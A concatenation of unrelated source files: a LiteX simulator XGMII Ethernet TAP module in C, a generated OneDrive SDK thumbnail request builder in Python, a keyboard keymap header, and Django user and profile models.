    // ---------- RX (TAP -> Sim) STATE ---------
    xgmii_rx_state_t rx_state;
    // Packet currently being received over the XGMII bus (TAP ->
    // Sim). Packets copied here are already removed from the TAP
    // incoming queue. Fields are valid if current_rx_len != 0. This
    // field includes the CRC32 checksum.
    uint8_t current_rx_pkt[ETH_LEN + sizeof(uint32_t)];
    size_t current_rx_len;
    size_t current_rx_progress;
    // Linked list of pending RX (TAP -> Sim) packets. tail is only
    // valid when head != NULL.
    eth_packet_queue_t *pending_rx_pkt_head;
    eth_packet_queue_t *pending_rx_pkt_tail;
    // libevent read event registered for tap_fd.
    struct event *ev;
} xgmii_ethernet_state_t;
// Shared libevent state, set on module init
static struct event_base *base = NULL;
/**
* Advance the RX (TAP->Sim) state machine, producing a 64-bit bus word
*
* This method must be called on the rising clock edge. It will produce a 64-bit
* XGMII bus word which needs to be presented to the device. Depending on the
* bus width, this may either happen entirely on the rising clock edge (64-bit)
* or on both the rising and falling clock edges (32-bit DDR).
*
* This function will detect pending RX packets in the queue and remove them
* accordingly. Thus it is important that this function will be called on every
* rising clock edge, regardless of whether a packet is currently being
* transmitted.
*/
static xgmii_bus_snapshot_t xgmii_ethernet_rx_adv(xgmii_ethernet_state_t *s,
                                                  uint64_t time_ps) {
    xgmii_bus_snapshot_t bus;
    // Check whether we are currently transmitting a packet over the XGMII
    // interface (i.e. whether there are still bytes left in the packet input
    // buffer)
    if (s->current_rx_len) {
        // There are bytes to send, check whether we're currently idling or
        // already transmitting.
        if (s->rx_state == XGMII_RX_STATE_IDLE) {
            // Currently idling, thus initiate a new transmission.
            // Reset the transmit progress
            s->current_rx_progress = 0;
            // Send the start-of-packet XGMII control code, the
            // preamble and the start of frame delimiter.
            bus.data = XGMII_FB_PREAMBLE_SF_DATA;
            bus.ctl = XGMII_FB_PREAMBLE_SF_CTL;
            // Enter the RECEIVE state.
            s->rx_state = XGMII_RX_STATE_RECEIVE;
        } else if (s->rx_state == XGMII_RX_STATE_RECEIVE) {
            // Reception of the packet has been initiated, transfer as much as
            // required.
            // Initialize ctl and data to zero
            bus.ctl = 0;
            bus.data = 0;
            // Place the bytes one by one: either with data, end of frame
            // delimiters or idle markers
            for (int idx = 0; idx < sizeof(bus.data); idx++) {
                if (s->current_rx_progress < s->current_rx_len) {
                    // Actual data byte to transmit
                    bus.data |=
                        ((uint64_t)
                         (s->current_rx_pkt[s->current_rx_progress] & 0xFF))
                        << (idx * 8);
                    s->current_rx_progress++;
                } else if (s->current_rx_progress == s->current_rx_len) {
                    // End of frame delimiter to transmit
                    bus.data |=
                        ((uint64_t) XGMII_CTLCHAR_END)
                        << (idx * 8);
                    bus.ctl |= 1 << idx;
                    // We deliberately let the progress advance beyond the
                    // length here, to indicate that we've already transmitted
                    // the end-of-frame buffer
                    s->current_rx_progress++;
                    // Furthermore, set the packet length to zero to mark
                    // that a new packet can be transmitted (invalidating
                    // the current one).
                    s->current_rx_len = 0;
                    // We return into the idle state here, there's nothing more
                    // to send.
                    s->rx_state = XGMII_RX_STATE_IDLE;
                } else {
                    // Fill the rest of this bus word with idle indicators
                    bus.data |= ((uint64_t) XGMII_CTLCHAR_IDLE) << (idx * 8);
                    bus.ctl |= 1 << idx;
                }
            }
            // If not transitioned to IDLE state above, remain in RECEIVE
            // state.
        }
    } else {
        // No packet to transmit, indicate that we are idle.
        bus.data = XGMII_IDLE_DATA;
        bus.ctl = XGMII_IDLE_CTL;
    }
    if (!s->current_rx_len) {
        // No packet is currently in transit (or one has just completed
        // reception). Check if there is an outstanding packet from the TAP
        // interface and copy it into the input buffer
        if (s->pending_rx_pkt_head) {
            eth_packet_queue_t* popped_rx_pkt;
            // NOTE(review): the queue is mutated without a lock; this assumes
            // the libevent TAP callback enqueuing packets runs on the same
            // thread as the simulation tick — confirm before adding threads.
            // CRITICAL REGION {
            // Advance the pending packets queue, removing the copied
            // packet and freeing its allocated memory.
            popped_rx_pkt = s->pending_rx_pkt_head;
            s->pending_rx_pkt_head = s->pending_rx_pkt_head->next;
            // } CRITICAL REGION
            // Determine the maximum length to copy. We must not copy
            // beyond the length of s->current_rx_pkt and need to
            // reserve at least 4 bytes for the CRC32 to be appended.
            size_t copy_len =
                (popped_rx_pkt->len
                 <= sizeof(s->current_rx_pkt) - sizeof(uint32_t))
                ? popped_rx_pkt->len
                : sizeof(s->current_rx_pkt) - sizeof(uint32_t);
            // Copy the packet into the buffer
            memcpy(s->current_rx_pkt, popped_rx_pkt->data, copy_len);
            // Calculate the CRC32 checksum and append it to the
            // packet data. This uses the original packet's length. If
            // the original packet didn't fit into the buffer, the CRC
            // is going to be wrong and thus the packet being cut off
            // can be detected.
            // NOTE(review): the FCS is appended most-significant byte first;
            // confirm the device's RX path expects this ordering (Ethernet
            // conventionally transmits the CRC32 least-significant byte
            // first).
            uint32_t crc = crc32(0, popped_rx_pkt->data, popped_rx_pkt->len);
            s->current_rx_pkt[copy_len + 0] = (crc >> 24) & 0xFF;
            s->current_rx_pkt[copy_len + 1] = (crc >> 16) & 0xFF;
            s->current_rx_pkt[copy_len + 2] = (crc >> 8) & 0xFF;
            s->current_rx_pkt[copy_len + 3] = (crc >> 0) & 0xFF;
#ifdef XGMII_RX_DEBUG
            fprintf(stderr, "\n----------------------------------\n"
                    "Received packet with %ld bytes\n", popped_rx_pkt->len);
            for (size_t i = 0; i < popped_rx_pkt->len; i++) {
                fprintf(stderr, "%02x", popped_rx_pkt->data[i] & 0xff);
                if (i != 0 && (i + 1) % 16 == 0) {
                    fprintf(stderr, "\n");
                } else if (i != 0 && (i + 1) % 8 == 0) {
                    fprintf(stderr, " ");
                }
            }
            fprintf(stderr, "\n----------------------------------\n");
#endif
            // Set the packet length (including CRC32) and thus
            // indicate that a packet is ready to be transmitted over
            // the XGMII interface
            s->current_rx_len = copy_len + sizeof(uint32_t);
            // Release the packet data memory
            free(popped_rx_pkt);
        }
    }
    return bus;
}
/**
* Advance the TX (Sim -> TAP) state machine based on a 64-bit bus word
*
* This method must be called whenever a full 64-bit bus word has been
* transmitted by the device. This means that for a 64-bit bus, it must be
* invoked on the rising clock edge, whereas on a 32-bit (DDR) bus it must be
* invoked on the falling clock edge when the entire 64-bit bus word has been
* transmitted.
*
* This function will detect frames sent by the device and place them on the TAP
* network interface.
*/
static void xgmii_ethernet_tx_adv(xgmii_ethernet_state_t *s, uint64_t time_ps,
                                  xgmii_bus_snapshot_t bus) {
    // NOTE: time_ps is currently unused here; kept for signature symmetry
    // with the RX path.
    if (s->tx_state == XGMII_TX_STATE_IDLE) {
        // Idling until a XGMII start of packet control marker is detected. By
        // IEEE802.3, this must be on the first octect of the XGMII bus (which
        // replaces one Ethernet preamble octet).
        if ((bus.data & 0xFF) == XGMII_CTLCHAR_START && (bus.ctl & 0x01) != 0) {
            // The rest of the 64-bit data word must be the remaining 48 bits of
            // the preamble and the Ethernet start of frame delimiter. Thus we
            // can match on the entire 64-bit data word here. We can't combine
            // this check with the one above, as we issue an error if we see a
            // XGMII start control character with garbage behind it.
            if (bus.data == XGMII_FB_PREAMBLE_SF_DATA
                && bus.ctl == XGMII_FB_PREAMBLE_SF_CTL) {
                // XGMII start character, preamble and Ethernet start of frame
                // matched, start accepting payload data.

                // Reset the current progress
                s->current_tx_len = 0;

                // Switch to the TRANSMIT state
                s->tx_state = XGMII_TX_STATE_TRANSMIT;
            } else {
                fprintf(stderr, "[xgmii_ethernet]: got XGMII start character, "
                        "but either Ethernet preamble or start of frame "
                        "delimiter is not valid: %016lx %02x\n",
                        bus.data, bus.ctl);
            }
        } else {
#ifdef XGMII_TX_DEBUG_INVAL_SIGNAL
            // Optional strict-mode debugging: while idle, every byte on the
            // bus must be an XGMII idle control character (0x07).
            for (size_t idx = 0; idx < sizeof(xgmii_data_t); idx++) {
                if ((bus.ctl & (1 << idx)) != 0) {
                    if (((bus.data >> (idx * 8)) & 0xFF) != 0x07) {
                        fprintf(stderr, "[xgmii_ethernet]: got invalid XGMII "
                                "control character in XGMII_TX_STATE_IDLE: "
                                "%016lx %02x %lu\n", bus.data, bus.ctl, idx);
                    }
                } else {
                    fprintf(stderr, "[xgmii_ethernet]: got non-XGMII control "
                            "character in XGMII_TX_STATE_IDLE without "
                            "proper XGMII_CTLCHAR_START: %016lx %02x %lu\n",
                            bus.data, bus.ctl, idx);
                }
            }
#endif
        }
    } else if (s->tx_state == XGMII_TX_STATE_TRANSMIT) {
        // Iterate over all bytes until we hit an XGMII end of frame control
        // character
        size_t idx;
        bool drop_warning_issued = false;
        bool transmission_finished = false;
        for (idx = 0; idx < sizeof(xgmii_data_t); idx++) {
            // Check whether we are reading a data or control character
            if ((bus.ctl & (1 << idx)) == 0) {
                // We are reading a data character. If ETH_LEN is reached, drop
                // other bytes and issue a warning once.
                //
                // NOTE(review): the `<=` bound allows a write at index
                // ETH_LEN, i.e. ETH_LEN + 1 bytes in total -- confirm that
                // current_tx_pkt is dimensioned ETH_LEN + 1 (or larger).
                if (s->current_tx_len <= ETH_LEN) {
                    s->current_tx_pkt[s->current_tx_len++] =
                        (uint8_t) (bus.data >> (idx * 8) & 0xFF);
                } else if (!drop_warning_issued) {
                    drop_warning_issued = true;
                    fprintf(stderr, "[xgmii_ethernet]: TX ETH_LEN reached, "
                            "dropping frame data. Check the MTU.\n");
                }
            } else {
                // Check what type of control character is received. Only
                // XGMII_CTLCHAR_END is valid, all others indicate an error
                // condition.
                if (((bus.data >> (idx * 8)) & 0xFF) == XGMII_CTLCHAR_END) {
                    transmission_finished = true;
                    idx++; // Important to avoid checking the XGMII_CTLCHAR_END
                           // in the debug for-loop below
                    break;
                } else {
                    fprintf(stderr, "[xgmii_ethernet]: received non-end XGMII "
                            "control character in XGMII_TX_STATE_TRANSMIT. "
                            "Aborting TX. %016lx %02x %lu\n", bus.data, bus.ctl,
                            idx);
                    s->tx_state = XGMII_TX_STATE_IDLE;
                    return;
                }
            }
        }

#ifdef XGMII_TX_DEBUG_INVAL_SIGNAL
        // If additional debugging is enabled, also verify that all remaining
        // bytes are XGMII idle markers. This must be true, as the only
        // possibility for there to be remaining bytes is to exit the loop with
        // a break statement, which only happens in the case a XGMII end control
        // character is recognized. The next frame can however only start with
        // the next 64-bit bus word. Thus the device must fill the rest of the
        // 64-bit bus word with idle control characters.
        //
        // Avoid further incrementing `idx` conditionally due to preprocessor
        // macros to prevent introducing tricky bugs.
        for (size_t chk_idx = idx; chk_idx < sizeof(xgmii_data_t); chk_idx++) {
            if ((bus.ctl & (1 << chk_idx)) == 0
                || ((bus.data >> (chk_idx * 8)) & 0xFF) != XGMII_CTLCHAR_IDLE) {
                fprintf(stderr, "[xgmii_ethernet]: received non-XGMII idle "
                        "control character after XGMII end of frame marker. "
                        "%016lx %02x %lu\n", bus.data, bus.ctl, chk_idx);
            }
        }
#endif

        // Length without frame check sequence
        size_t pkt_len =
            (s->current_tx_len > 3) ? s->current_tx_len - 4 : 0;

        if (transmission_finished) {
#ifdef XGMII_TX_DEBUG
            fprintf(stderr, "\n----------------------------------\n"
                    "Transmitted packet with %ld bytes\n", pkt_len);
            for (size_t i = 0; i < pkt_len; i++) {
                fprintf(stderr, "%02x", s->current_tx_pkt[i] & 0xff);
                if (i != 0 && (i + 1) % 16 == 0) {
                    fprintf(stderr, "\n");
                } else if (i != 0 && (i + 1) % 8 == 0) {
                    fprintf(stderr, " ");
                }
            }
            fprintf(stderr, "\n----------------------------------\n");
#endif

            // Validate the trailing CRC32 frame check sequence (little-endian
            // byte order) against a locally computed checksum. A mismatch is
            // only reported, the frame is still forwarded to the TAP device.
            if (s->current_tx_len < 4) {
                fprintf(stderr, "[xgmii_ethernet]: TX packet too short to contain "
                        "frame check sequence\n");
            } else {
                uint32_t crc = crc32(0, s->current_tx_pkt, pkt_len);
                if (!((s->current_tx_pkt[pkt_len + 0] == ((crc >> 0) & 0xFF))
                      && (s->current_tx_pkt[pkt_len + 1] == ((crc >> 8) & 0xFF))
                      && (s->current_tx_pkt[pkt_len + 2] == ((crc >> 16) & 0xFF))
                      && (s->current_tx_pkt[pkt_len + 3] == ((crc >> 24) & 0xFF))))
                {
                    fprintf(stderr, "[xgmii_ethernet]: TX packet FCS mismatch. "
                            "Expected: %08x. Actual: %08x.\n", crc,
                            (uint32_t) s->current_tx_pkt[pkt_len + 0] << 0
                            | (uint32_t) s->current_tx_pkt[pkt_len + 1] << 8
                            | (uint32_t) s->current_tx_pkt[pkt_len + 2] << 16
                            | (uint32_t) s->current_tx_pkt[pkt_len + 3] << 24);
                }
            }

            // Packet read completely, place it on the TAP interface
            tapcfg_write(s->tapcfg, s->current_tx_pkt, s->current_tx_len);
            s->tx_state = XGMII_TX_STATE_IDLE;
        }
    }
}
/**
 * Per-simulation-step callback: samples the TX bus and drives the RX bus.
 *
 * For a 64-bit XGMII bus, one full bus word is exchanged per rising clock
 * edge. For a 32-bit (DDR) bus, the lower half is exchanged on the rising
 * and the upper half on the falling clock edge.
 */
static int xgmii_ethernet_tick(void *state, uint64_t time_ps) {
    xgmii_ethernet_state_t *s = (xgmii_ethernet_state_t*) state;

    // ---------- TX BUS (Sim -> TAP) ----------
    // Determine the current TX clock edge. Depending on the XGMII_WIDTH, we
    // must act on both the rising and falling clock edge.
    clk_edge_t tx_edge = clk_edge(&s->tx_clk_edge, *s->tx_clk);
#if XGMII_WIDTH == 64
    // 64-bit bus. Sample the entire data on the rising clock edge and process
    // accordingly.
    if (tx_edge == CLK_EDGE_RISING) {
        xgmii_bus_snapshot_t tx_bus = {
            .data = *s->tx_data_signal,
            .ctl = *s->tx_ctl_signal,
        };
        xgmii_ethernet_tx_adv(s, time_ps, tx_bus);
    }
#elif XGMII_WIDTH == 32
    // 32-bit bus. Sample the lower half of the data on the rising clock edge.
    if (tx_edge == CLK_EDGE_RISING) {
        s->tx_data_posedge = *s->tx_data_signal;
        s->tx_ctl_posedge = *s->tx_ctl_signal;
    }

    // Sample the higher half of the data on the falling clock edge and process
    // the joint data from the rising and falling edges.
    if (tx_edge == CLK_EDGE_FALLING) {
        xgmii_bus_snapshot_t tx_bus = {
            .data =
                (xgmii_data_t) (*s->tx_data_signal) << XGMII_UPPER_DATA_SHIFT
                | (xgmii_data_t) s->tx_data_posedge,
            .ctl =
                (xgmii_ctl_t) (*s->tx_ctl_signal) << XGMII_UPPER_CTL_SHIFT
                | (xgmii_ctl_t) s->tx_ctl_posedge,
        };
        xgmii_ethernet_tx_adv(s, time_ps, tx_bus);
    }
#endif

    // ---------- RX BUS (TAP -> Sim) ----------
    // Determine the current RX clock edge. Depending on the XGMII_WIDTH, we
    // must act on both the rising and falling clock edge.
    clk_edge_t rx_edge = clk_edge(&s->rx_clk_edge, *s->rx_clk);
    if (rx_edge == CLK_EDGE_RISING) {
        // Positive clock edge, advance the RX state and place new contents on
        // the XGMII RX bus.
        xgmii_bus_snapshot_t rx_bus = xgmii_ethernet_rx_adv(s, time_ps);
#if XGMII_WIDTH == 64
        // 64-bit wide bus. We can transmit everything on the positive clock
        // edge.
        *s->rx_data_signal = rx_bus.data;
        *s->rx_ctl_signal = rx_bus.ctl;
#elif XGMII_WIDTH == 32
        // 32-bit wide bus. We must transmit the lower half of bits on the
        // positive, and the upper half of bits on the negative clock edge.
        *s->rx_data_signal = (xgmii_data_signal_t)
            rx_bus.data & XGMII_DATA_SIGNAL_MASK;
        *s->rx_ctl_signal = (xgmii_ctl_signal_t)
            rx_bus.ctl & XGMII_CTL_SIGNAL_MASK;
        // Stash the upper half for the upcoming falling edge.
        s->rx_data_negedge = (xgmii_data_signal_t)
            ((rx_bus.data >> XGMII_UPPER_DATA_SHIFT) & XGMII_DATA_SIGNAL_MASK);
        s->rx_ctl_negedge = (xgmii_ctl_signal_t)
            ((rx_bus.ctl >> XGMII_UPPER_CTL_SHIFT) & XGMII_CTL_SIGNAL_MASK);
#endif
    }

#if XGMII_WIDTH == 32
    if (rx_edge == CLK_EDGE_FALLING) {
        // 32-bit wide bus and negative clock edge. Transmit the data prepared
        // on the previous positive clock edge.
        *s->rx_data_signal = s->rx_data_negedge;
        *s->rx_ctl_signal = s->rx_ctl_negedge;
    }
#endif

    return RC_OK;
}
int litex_sim_module_get_args(char *args, char *arg, char **val) {
int ret = RC_OK;
json_object *jsobj = NULL;
json_object *obj = NULL;
char *value = NULL;
int r;
jsobj = json_tokener_parse(args);
if (NULL == jsobj) {
fprintf(stderr, "[xgmii_ethernet]: error parsing json arg: %s\n", args);
ret = RC_JSERROR;
goto out;
}
if (!json_object_is_type(jsobj, json_type_object)) {
fprintf(stderr, "[xgmii_ethernet]: arg must be type object!: %s\n",
args);
ret = RC_JSERROR;
goto out;
}
obj = NULL;
r = json_object_object_get_ex(jsobj, arg, &obj);
if (!r) {
fprintf(stderr, "[xgmii_ethernet]: could not find object: \"%s\" "
"(%s)\n", arg, args);
ret = RC_JSERROR;
goto out;
}
value = strdup(json_object_get_string(obj));
out:
*val = value;
return ret;
}
/**
 * Look up the signal pointer for pad `name` in the NULL-name-terminated
 * `pads` array and store it in *signal (NULL if not found).
 *
 * Fix: the previous version unconditionally wrote through `signal` at the
 * exit label, dereferencing a NULL pointer when the argument validation
 * failed with RC_INVARG. The output is now only written for valid arguments.
 */
static int litex_sim_module_pads_get(struct pad_s *pads, char *name,
                                     void **signal) {
    void *sig = NULL;

    if (!pads || !name || !signal) {
        return RC_INVARG;
    }

    for (int i = 0; pads[i].name; i++) {
        if (!strcmp(pads[i].name, name)) {
            sig = (void *) pads[i].signal;
            break;
        }
    }

    *signal = sig;
    return RC_OK;
}
/**
 * libevent callback: moves a packet from the TAP interface into the pending
 * RX packet queue of the module state `arg`.
 *
 * Fix: the malloc() result was dereferenced without a NULL check; an
 * allocation failure now drops the packet with a diagnostic instead of
 * crashing the simulation.
 */
void event_handler(int tap_fd, short event, void *arg) {
    xgmii_ethernet_state_t *s = arg;

    // Expect a new TAP packet if the socket has become readable
    if (event & EV_READ) {
        eth_packet_queue_t *rx_pkt =
            malloc(sizeof(eth_packet_queue_t));
        if (!rx_pkt) {
            fprintf(stderr, "[xgmii_ethernet]: RX packet allocation failed, "
                    "dropping TAP packet\n");
            return;
        }

        // Read the TAP packet into the buffer, extending its length
        // to the minimum required Ethernet frame length if necessary.
        int read_len = tapcfg_read(s->tapcfg, rx_pkt->data, ETH_LEN);
        if (read_len < 0) {
            // An error occured while reading from the TAP interface,
            // report, free the packet and abort.
            fprintf(stderr, "[xgmii_ethernet]: TAP read error %d\n", read_len);
            free(rx_pkt);
            return;
        } else if (read_len < MIN_ETH_LEN) {
            // To avoid leaking any data, set the packet's contents
            // after the proper received length to zero.
            memset(&rx_pkt->data[read_len], 0, MIN_ETH_LEN - read_len);
            rx_pkt->len = MIN_ETH_LEN;
        } else {
            // A packet larger than the minimum Ethernet frame length
            // has been read.
            rx_pkt->len = read_len;
        }

        // Packet is inserted into the back of the queue, thus no next
        // packet.
        rx_pkt->next = NULL;

        // CRITICAL REGION {
        // Append the received packet to the packet queue
        if (!s->pending_rx_pkt_head) {
            s->pending_rx_pkt_head = rx_pkt;
            s->pending_rx_pkt_tail = rx_pkt;
        } else {
            s->pending_rx_pkt_tail->next = rx_pkt;
            s->pending_rx_pkt_tail = rx_pkt;
        }
        // } CRITICAL REGION
    }
}
/**
 * Wire up the module's signal pointers from the simulator pad lists.
 *
 * Recognizes the "xgmii_eth" pad list (XGMII RX/TX data and control lines)
 * and the "sys_clk" pad list (clock input).
 */
static int xgmii_ethernet_add_pads(void *state, struct pad_list_s *plist) {
    xgmii_ethernet_state_t *s = (xgmii_ethernet_state_t *) state;

    if (!state || !plist) {
        return RC_INVARG;
    }

    struct pad_s *pads = plist->pads;

    if (!strcmp(plist->name, "xgmii_eth")) {
        litex_sim_module_pads_get(pads, "rx_data", (void **) &s->rx_data_signal);
        litex_sim_module_pads_get(pads, "rx_ctl", (void **) &s->rx_ctl_signal);
        litex_sim_module_pads_get(pads, "tx_data", (void **) &s->tx_data_signal);
        litex_sim_module_pads_get(pads, "tx_ctl", (void **) &s->tx_ctl_signal);
    }

    if (!strcmp(plist->name, "sys_clk")) {
        // TODO: currently the single sys_clk signal is used for both the RX and
        // TX XGMII clock signals. This should be changed. Also, using sys_clk
        // does not make sense for the 32-bit DDR bus.
        litex_sim_module_pads_get(pads, "sys_clk", (void **) &s->rx_clk);
        s->tx_clk = s->rx_clk;
    }

    return RC_OK;
}
// Module start callback: stores the libevent base handed over by the
// simulator core (used later by xgmii_ethernet_new to register the TAP fd
// event) and reports that the module was loaded.
static int xgmii_ethernet_start(void *b) {
    base = (struct event_base *) b;
    printf("[xgmii_ethernet] loaded (%p)\n", base);
    return RC_OK;
}
/**
 * Module instantiation callback: allocates the module state, parses the
 * "interface" and "ip" JSON arguments, brings up the TAP device and
 * registers a persistent read event for it.
 *
 * Fixes:
 * - with state == NULL, the old exit path still executed `*state = ...`,
 *   dereferencing NULL; we now bail out before that.
 * - `c_tap` leaked when parsing the "ip" argument failed; both strings are
 *   now freed on every path (free(NULL) is a no-op).
 */
static int xgmii_ethernet_new(void **state, char *args) {
    int ret = RC_OK;
    char *c_tap = NULL;
    char *c_tap_ip = NULL;
    xgmii_ethernet_state_t *s = NULL;
    struct timeval tv = {10, 0};

    if (!state) {
        return RC_INVARG;
    }

    s = (xgmii_ethernet_state_t*)malloc(sizeof(xgmii_ethernet_state_t));
    if (!s) {
        ret = RC_NOENMEM;
        goto out;
    }
    memset(s, 0, sizeof(xgmii_ethernet_state_t));

    ret = litex_sim_module_get_args(args, "interface", &c_tap);
    if (ret != RC_OK) {
        goto out;
    }
    ret = litex_sim_module_get_args(args, "ip", &c_tap_ip);
    if (ret != RC_OK) {
        goto out;
    }

    s->tapcfg = tapcfg_init();
    tapcfg_start(s->tapcfg, c_tap, 0);
    s->tap_fd = tapcfg_get_fd(s->tapcfg);
    tapcfg_iface_set_hwaddr(s->tapcfg, macadr, 6);
    tapcfg_iface_set_ipv4(s->tapcfg, c_tap_ip, 24);
    tapcfg_iface_set_status(s->tapcfg, TAPCFG_STATUS_ALL_UP);

    s->ev = event_new(base, s->tap_fd, EV_READ | EV_PERSIST, event_handler, s);
    event_add(s->ev, &tv);

out:
    free(c_tap);
    free(c_tap_ip);
    *state = (void*) s;
    return ret;
}
// Module descriptor registered with the simulator core. Fields are,
// presumably in ext_module_s declaration order: name, start, new, add_pads,
// an unused callback slot (NULL), and tick -- confirm against ext_module_s.
static struct ext_module_s ext_mod = {
    "xgmii_ethernet",
    xgmii_ethernet_start,
    xgmii_ethernet_new,
    xgmii_ethernet_add_pads,
    NULL,
    xgmii_ethernet_tick
};
/**
 * Entry point called by the simulator to register this external module.
 */
int litex_sim_ext_module_init(int (*register_module)(struct ext_module_s *)) {
    // Initiate calculation of zlib's CRC32 lookup table such that
    // multithreaded calls to crc32() are safe.
    get_crc_table();
    return register_module(&ext_mod);
}
| 14,051 |
912 | # -*- coding: utf-8 -*-
'''
# Copyright (c) 2015 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# This file was generated and any changes will be overwritten.
'''
from __future__ import unicode_literals
from .thumbnail_set_request import ThumbnailSetRequest
from ..request_builder_base import RequestBuilderBase
from ..request.thumbnail_request_builder import ThumbnailRequestBuilder
class ThumbnailSetRequestBuilder(RequestBuilderBase):
    """Builds requests and child request builders for a ThumbnailSet resource."""

    def __init__(self, request_url, client):
        """Initialize the ThumbnailSetRequestBuilder

        Args:
            request_url (str): The url to perform the ThumbnailSetRequest
                on
            client (:class:`OneDriveClient<onedrivesdk.request.one_drive_client.OneDriveClient>`):
                The client which will be used for the request
        """
        super(ThumbnailSetRequestBuilder, self).__init__(request_url, client)

    def request(self, expand=None, select=None, options=None):
        """Builds the ThumbnailSetRequest

        Args:
            expand (str): Default None, comma-separated list of relationships
                to expand in the response.
            select (str): Default None, comma-separated list of properties to
                include in the response.
            options (list of :class:`Option<onedrivesdk.options.Option>`):
                A list of options to pass into the request. Defaults to None.

        Returns:
            :class:`ThumbnailSetRequest<onedrivesdk.request.thumbnail_set_request.ThumbnailSetRequest>`:
                The ThumbnailSetRequest
        """
        request = ThumbnailSetRequest(self._request_url, self._client, options)
        request._set_query_options(expand=expand, select=select)
        return request

    def delete(self):
        """Deletes the specified ThumbnailSet."""
        self.request().delete()

    def get(self):
        """Gets the specified ThumbnailSet.

        Returns:
            :class:`ThumbnailSet<onedrivesdk.model.thumbnail_set.ThumbnailSet>`:
                The ThumbnailSet.
        """
        return self.request().get()

    def update(self, thumbnail_set):
        """Updates the specified ThumbnailSet.

        Args:
            thumbnail_set (:class:`ThumbnailSet<onedrivesdk.model.thumbnail_set.ThumbnailSet>`):
                The ThumbnailSet to update.

        Returns:
            :class:`ThumbnailSet<onedrivesdk.model.thumbnail_set.ThumbnailSet>`:
                The updated ThumbnailSet
        """
        return self.request().update(thumbnail_set)

    def _child_thumbnail(self, segment):
        """Build a ThumbnailRequestBuilder for the given URL segment."""
        return ThumbnailRequestBuilder(self.append_to_request_url(segment),
                                       self._client)

    @property
    def large(self):
        """The large thumbnail request builder.

        Returns:
            :class:`ThumbnailRequestBuilder<onedrivesdk.request.thumbnail_request.ThumbnailRequestBuilder>`:
                A request builder created from the ThumbnailSetRequestBuilder
        """
        return self._child_thumbnail("large")

    @property
    def medium(self):
        """The medium thumbnail request builder.

        Returns:
            :class:`ThumbnailRequestBuilder<onedrivesdk.request.thumbnail_request.ThumbnailRequestBuilder>`:
                A request builder created from the ThumbnailSetRequestBuilder
        """
        return self._child_thumbnail("medium")

    @property
    def small(self):
        """The small thumbnail request builder.

        Returns:
            :class:`ThumbnailRequestBuilder<onedrivesdk.request.thumbnail_request.ThumbnailRequestBuilder>`:
                A request builder created from the ThumbnailSetRequestBuilder
        """
        return self._child_thumbnail("small")

    @property
    def source(self):
        """The source thumbnail request builder.

        Returns:
            :class:`ThumbnailRequestBuilder<onedrivesdk.request.thumbnail_request.ThumbnailRequestBuilder>`:
                A request builder created from the ThumbnailSetRequestBuilder
        """
        return self._child_thumbnail("source")
| 1,903 |
791 | #ifndef KEYMAP_H
#define KEYMAP_H
#include "common.h"
/* Bitmask of currently-held modifier keys, as tracked by the keyboard
 * driver. */
typedef enum KeyModifier
{
    KM_LeftShift = 1,
    KM_RightShift = 2,
    KM_Ctrl = 4,
    KM_Alt = 8
} KeyModifier;

/* Raw scan codes for modifier, lock and function keys. */
enum
{
    KEY_LEFTSHIFT = 0x2A,
    KEY_RIGHTSHIFT = 0x36,
    KEY_CTRL = 0x1D,
    KEY_ALT = 0x38,
    KEY_CAPSLOCK = 0x3A,
    KEY_F1 = 0x3B,
    KEY_F2 = 0x3C,
    KEY_F3 = 0x3D
};

// PC keyboard interface constants

#define KBSTATP         0x64    // kbd controller status port(I)
#define KBS_DIB         0x01    // kbd data in buffer
#define KBDATAP         0x60    // kbd data port(I)

/* Flag bits for the driver's internal shift/lock state word. */
#define NO              0

#define SHIFT           (1<<0)
#define CTL             (1<<1)
#define ALT             (1<<2)

#define CAPSLOCK        (1<<3)
#define NUMLOCK         (1<<4)
#define SCROLLLOCK      (1<<5)

#define E0ESC           (1<<6)  // in the middle of an 0xE0 escape sequence

// Special keycodes (driver-internal values for non-printable keys)
#define KEY_HOME        0xE0
#define KEY_END         0xE1
#define KEY_UP          0xE2
#define KEY_DOWN        0xE3
#define KEY_LEFT        0xE4
#define KEY_RIGHT       0xE5
#define KEY_PAGEUP      0xE6
#define KEY_PAGEDOWN    0xE7
#define KEY_INSERT      0xE8
#define KEY_DELETE      0xE9

// C('A') == Control-A
// Fix: the macro argument is now parenthesized so that expressions such as
// C(a | b) expand with the intended precedence.
#define C(x) ((x) - '@')

/* Scan-code -> character translation tables (defined in the driver). */
extern uint8_t g_key_map[256];
extern uint8_t g_key_shift_map[256];
#endif //KEYMAP_H | 704 |
865 | from django.contrib.auth.models import AbstractUser
from django.db import models
from django.db.models.signals import post_save
from api.utils.db_functions import make_uuid
class User(AbstractUser):
    # Custom user model with a UUID primary key.
    #
    # WARNING: class-level mutable attribute, shared by all User instances.
    # Presumably a placeholder/default for role handling -- confirm it is
    # never mutated per-instance.
    roles = []

    id = models.UUIDField(
        primary_key=True,
        help_text="ID of user",
        default=make_uuid,
        # NOTE(review): editable=True on a primary key is unusual; confirm
        # forms/admin are really meant to allow changing the UUID.
        editable=True,
    )
    username = models.CharField(default="", max_length=128, unique=True)

    def __str__(self):
        # Human-readable representation (used by the admin, logs, etc.).
        return self.username
class Profile(models.Model):
    # Per-user profile row; deleting the User cascades to its Profile.
    user = models.OneToOneField(
        User, related_name="profile", on_delete=models.CASCADE
    )
    # Set automatically when the row is first inserted.
    created_at = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return "%s's profile" % self.user

    class Meta:
        # Newest profiles first by default.
        ordering = ("-created_at",)
